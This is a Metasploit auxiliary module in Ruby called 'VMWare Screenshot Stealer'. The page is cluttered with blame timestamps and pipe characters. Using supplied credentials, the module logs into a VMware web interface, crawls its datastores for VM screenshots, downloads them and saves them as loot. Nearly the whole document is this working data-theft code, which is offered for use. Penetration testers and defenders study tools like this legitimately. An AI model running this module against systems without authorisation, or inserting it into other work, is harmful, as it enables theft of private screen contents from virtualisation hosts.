2012-02-13 18:05:32 +00:00
|
|
|
##
|
|
|
|
|
# $Id$
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
##
|
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
include Msf::Exploit::Remote::VIMSoap
|
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
|
super(
|
|
|
|
|
'Name' => 'VMWare Screenshot Stealer',
|
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
|
'Description' => %Q{
|
|
|
|
|
This module uses supplied login credentials to connect to VMWare via
|
|
|
|
|
the web interface. It then searches through the datastores looking for screenshots.
|
|
|
|
|
It will downlaod any screenshots it finds and save them as loot.},
|
|
|
|
|
'Author' => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
|
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(443),
|
|
|
|
|
OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]),
|
|
|
|
|
OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ])
|
|
|
|
|
], self.class)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
|
if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success
|
|
|
|
|
@user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
|
|
|
|
crawl_page('/folder')
|
|
|
|
|
else
|
|
|
|
|
print_error "Login Failure on #{ip}"
|
|
|
|
|
return
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def crawl_page(path, parent='')
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'uri' => path,
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'cookie' => @vim_cookie,
|
|
|
|
|
'headers' => { 'Authorization' => "Basic #{@user_pass}"}
|
|
|
|
|
}, 25)
|
|
|
|
|
if res
|
|
|
|
|
@vim_cookie = res.headers['Set-Cookie']
|
|
|
|
|
if res.code== 200
|
|
|
|
|
res.body.scan(/<a href="([\w\/\?=&;%]+)">/) do |match|
|
|
|
|
|
link = match[0]
|
|
|
|
|
link.gsub!('&', '&')
|
|
|
|
|
case link
|
|
|
|
|
when /%2epng?/
|
|
|
|
|
img_name = Rex::Text::uri_decode(link.match(/\/([\w\?=&;%]+%2epng)/)[1])
|
|
|
|
|
print_good "Screenshot Found: #{img_name} Full Path: #{link}"
|
|
|
|
|
grab_screenshot(link, img_name)
|
|
|
|
|
when /%2e(?!png)/
|
|
|
|
|
next
|
|
|
|
|
when parent
|
|
|
|
|
next
|
|
|
|
|
else
|
|
|
|
|
crawl_page(link, path)
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
elsif res.code == 401
|
|
|
|
|
print_error "Authorization Failure for: #{path}"
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def grab_screenshot(path, name)
|
|
|
|
|
res = send_request_cgi({
|
|
|
|
|
'uri' => path,
|
|
|
|
|
'method' => 'GET',
|
|
|
|
|
'cookie' => @vim_cookie,
|
|
|
|
|
'headers' => { 'Authorization' => "Basic #{@user_pass}"}
|
|
|
|
|
}, 25)
|
|
|
|
|
if res
|
|
|
|
|
@vim_cookie = res.headers['Set-Cookie']
|
|
|
|
|
if res.code == 200
|
|
|
|
|
img = res.body
|
2012-02-16 08:19:33 +00:00
|
|
|
ss_path = store_loot("host.vmware.screenshot", "image/png", datastore['RHOST'], img, name , "Screenshot of VM #{name}")
|
2012-02-13 18:05:32 +00:00
|
|
|
print_status "Screenshot saved to #{ss_path}"
|
|
|
|
|
else
|
|
|
|
|
print_error "Failed to retrieve screenshot at #{path} HTTP Response code #{res.code} "
|
|
|
|
|
end
|
|
|
|
|
else
|
|
|
|
|
print_error "Failed to retrieve screenshot: there was no reply"
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
